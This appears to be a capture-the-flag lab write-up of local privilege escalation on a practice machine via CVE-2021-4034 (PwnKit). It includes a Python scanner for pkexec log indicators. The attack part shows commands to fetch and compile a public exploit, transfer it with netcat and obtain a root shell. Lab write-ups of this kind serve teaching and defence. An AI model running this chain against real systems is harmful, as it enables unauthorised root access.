CVE-2021-4034


PEAS (linPEAS) flagged the target system as vulnerable to CVE-2021-4034 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034). The vulnerable program, pkexec, is part of Polkit, which governs the privileges processes may obtain. pkexec lets a non-privileged process run a command as another, usually privileged, user after Polkit's authorization checks, a role comparable to sudo.

A memory corruption flaw is triggered when pkexec is invoked with no arguments at all. By manipulating environment variables, a local attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
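The environment-variable route usually leaves traces in the authpriv log, because pkexec itself logs when the SHELL value is absent from /etc/shells or when an environment variable fails its content check (some exploit variants avoid these lines, so their absence proves nothing). As an added example, not part of this writeup, here is a small Python scanner over constructed syslog lines (host, PIDs, timestamps and commands are made up) that extracts those two pkexec messages as indicators of attempted exploitation:

```python
import re

# Constructed sample syslog lines (not logs from the target): two pkexec
# environment-validation failures, one benign pkexec run and one sudo line.
# The odd spellings ("not found the", "suscipious") are pkexec's own message text.
SAMPLE_LOG = """\
Jan 26 14:02:11 seal pkexec[4711]: tomcat: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/dev/shm/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 26 14:02:11 seal pkexec[4712]: tomcat: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=/dev/pts/0] [CWD=/tmp] [COMMAND=/usr/bin/true]
Jan 26 14:03:00 seal pkexec[4800]: alice: Executing command [USER=root] [TTY=/dev/pts/1] [CWD=/home/alice] [COMMAND=/usr/bin/apt update]
Jan 26 14:03:05 seal sudo[4810]: alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt upgrade
"""

# Syslog line written by pkexec's log_message(): "<user>: <message>" followed by
# the bracketed USER/TTY/CWD/COMMAND fields.
PKEXEC_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) pkexec\[(?P<pid>\d+)\]: "
    r"(?P<user>[^:]+): (?P<msg>.*?)"
    r"(?: \[USER=[^\]]*\])?(?: \[TTY=[^\]]*\])?(?: \[CWD=(?P<cwd>[^\]]*)\])?"
    r"(?: \[COMMAND=(?P<cmd>[^\]]*)\])?$"
)

# Messages pkexec logs when it rejects a caller's environment; both are the
# residue of the SHELL / GCONV_PATH tampering that CVE-2021-4034 exploits rely on.
INDICATORS = {
    "shell_not_in_etc_shells": re.compile(
        r"The value for the SHELL variable was not found (?:in )?the /etc/shells file"),
    "suspicious_env_value": re.compile(
        r"The value for environment variable (?P<var>\S+) contains sus\w+ content"),
}

def find_pwnkit_indicators(log_text):
    """One dict per pkexec line matching a known environment-validation failure."""
    hits = []
    for line in log_text.splitlines():
        m = PKEXEC_RE.match(line)
        if not m:
            continue  # not a pkexec syslog line
        for name, pattern in INDICATORS.items():
            im = pattern.search(m.group("msg"))
            if im:
                hits.append({
                    "indicator": name, "time": m.group("ts"), "host": m.group("host"),
                    "pid": int(m.group("pid")), "user": m.group("user"),
                    "cwd": m.group("cwd"), "command": m.group("cmd"),
                    "variable": im.groupdict().get("var"),
                })
                break
    return hits
```

Run it against /var/log/auth.log (or `journalctl -t pkexec`) with `find_pwnkit_indicators(open(path).read())`; the CWD and COMMAND fields point straight at the staging directory and the planted shared object.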

Exploit (PwnKit)


I found an exploit online.

tomcat@seal:~$ make
 
Command 'make' not found, but can be installed with:
 
apt install make        # version 4.2.1-1.2, or
apt install make-guile  # version 4.2.1-1.2
 
Ask your administrator to install one of them.
 
tomcat@seal:~$ cc
 
Command 'cc' not found, but can be installed with:
 
apt install gcc              # version 4:9.3.0-1ubuntu2, or
apt install clang            # version 1:10.0-50~exp1
apt install pentium-builder  # version 0.21ubuntu1
apt install tcc              # version 0.9.27-8
 
Ask your administrator to install one of them.

The target system has no compiler installed (neither make nor cc is available), so the exploit is compiled remotely instead.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/htb/labs/seal]
└─$ docker run -it --entrypoint "/bin/bash" --name seal ubuntu:20.04  
root@b7ad5c17638b:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Setting up the environment

root@b7ad5c17638b:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), 22.69 KiB | 1.03 MiB/s, done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

A one-liner to download, compile and package the exploit, ready for transfer.

Exploitation


root@b7ad5c17638b:~# nc 10.10.10.250 2222 < CVE-2021-4034.tar.gz
tomcat@seal:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.7 51668
tomcat@seal:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

tomcat@seal:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
seal
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.250  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:d927  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:d927  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:d9:27  txqueuelen 1000  (Ethernet)
        RX packets 113088  bytes 11818508 (11.8 MB)
        RX errors 0  dropped 86  overruns 0  frame 0
        TX packets 94340  bytes 360222718 (360.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1280  bytes 3935419 (3.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1280  bytes 3935419 (3.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise